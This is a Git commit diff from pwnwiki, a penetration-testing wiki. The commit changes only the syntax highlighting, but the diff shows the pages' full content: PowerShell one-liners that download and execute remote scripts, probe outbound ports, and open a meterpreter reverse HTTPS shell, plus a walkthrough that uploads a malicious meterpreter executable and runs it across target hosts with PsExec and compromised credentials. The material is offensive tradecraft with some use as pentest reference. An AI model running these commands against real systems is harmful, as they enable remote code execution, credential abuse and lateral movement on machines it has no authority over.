weyne/pwnwiki.github.io
1
0
Fork 0
mirror of https://github.com/oXis/pwnwiki.github.io.git synced 2025-10-29 16:56:59 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #20 from wchen-r7/code_syntax

Browse Source 
Use syntax highlighting
This commit is contained in:
Rob Fuller 2013-12-02 21:03:43 -08:00
commit 9a05866621
2 changed files with 9 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
windows/powershell.md
View File

@ -5,25 +5,25 @@ One liners
**Download and Execute Remote Powershell Script** **Download and Execute Remote Powershell Script**
```PowerShell ```
iex (New-Object Net.WebClient).DownloadString("http://host/file.txt") iex (New-Object Net.WebClient).DownloadString("http://host/file.txt")
``` ```
**Download and Save File** **Download and Save File**
```PowerShell ```
(new-object System.Net.WebClient).Downloadfile('http://host/file.exe', 'file.exe') (new-object System.Net.WebClient).Downloadfile('http://host/file.exe', 'file.exe')
``` ```
**Enumerate Allowed Outbound Ports 1-1024** **Enumerate Allowed Outbound Ports 1-1024**
```PowerShell ```
$ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream(); $ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream();
$stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() -eq "w00tw00t"){echo "$_ Allowed out"}} $stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() -eq "w00tw00t"){echo "$_ Allowed out"}}
``` ```
**Reverse Shell Using [PowerSploit's Invoke-Shellcode](https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1)** **Reverse Shell Using [PowerSploit's Invoke-Shellcode](https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1)**
```PowerShell ```
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443 -Force Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443 -Force
``` ```

10
windows/uac.md
View File

@ -6,7 +6,7 @@ For this example, lets just assume that you have gotten a meterpreter shell on a
For starters we can turn to PsExec. PsExec will allow us to run commands against a remote machine, and comes with a handly little option, -h. For starters we can turn to PsExec. PsExec will allow us to run commands against a remote machine, and comes with a handly little option, -h.
``` ```bash
-h If the target system is Vista or higher, has the process -h If the target system is Vista or higher, has the process
run with the account's elevated token, if available. run with the account's elevated token, if available.
``` ```
@ -15,20 +15,20 @@ Seems handy for what were planning to do. Before we dive in though, I want to qu
Continuing on, the first step that we want to do is upload a copy of PsExec.exe and an encoded copy of a malicious meterepreter exe (see the Veil project for details on how to do this) up to the server. To do this, we could do: Continuing on, the first step that we want to do is upload a copy of PsExec.exe and an encoded copy of a malicious meterepreter exe (see the Veil project for details on how to do this) up to the server. To do this, we could do:
``` ```bash
upload *path to meterpreter exe* \\users\\*target user here*\\metpr.exe upload *path to meterpreter exe* \\users\\*target user here*\\metpr.exe
upload *path to PsExec.exe* \\users\\*target user here*\\PsExec.exe upload *path to PsExec.exe* \\users\\*target user here*\\PsExec.exe
``` ```
The next step to do is to gather a list of target IP addresses that you would like to try using your exploited user's authentication credentials against. Once you have done this, save it to a file (targets.txt in our example) and upload it to Box0. The next step to do is to gather a list of target IP addresses that you would like to try using your exploited user's authentication credentials against. Once you have done this, save it to a file (targets.txt in our example) and upload it to Box0.
``` ```bash
upload *path to targets.txt* \\users\\*target user here*\\targets.txt upload *path to targets.txt* \\users\\*target user here*\\targets.txt
``` ```
We then can run PsExec.exe as follows: We then can run PsExec.exe as follows:
``` ```bash
PsExec.exe @targets.txt -accepteula -c -f -h -d metr.exe PsExec.exe @targets.txt -accepteula -c -f -h -d metr.exe
``` ```
@ -47,7 +47,7 @@ We do have a slight problem though. Due to something called the double hop issue
We now need to find another host where our user is running with a primary token so that we can escalate privileges on Box0. To do this, we will use PsLoggedon.exe from same PsTools suite that PsExec.exe comes from. Taking the targets.txt file that we created, here is the command to pass through the credentials of our currently compromized user and find out where else he/she is logged in: We now need to find another host where our user is running with a primary token so that we can escalate privileges on Box0. To do this, we will use PsLoggedon.exe from same PsTools suite that PsExec.exe comes from. Taking the targets.txt file that we created, here is the command to pass through the credentials of our currently compromized user and find out where else he/she is logged in:
``` ```bash
for /F %i in (targets.txt) do @PsLoggedon.exe \\%i 2>NUL | find "*compromized user's name goes here*" >NUL && echo %i for /F %i in (targets.txt) do @PsLoggedon.exe \\%i 2>NUL | find "*compromized user's name goes here*" >NUL && echo %i
``` ```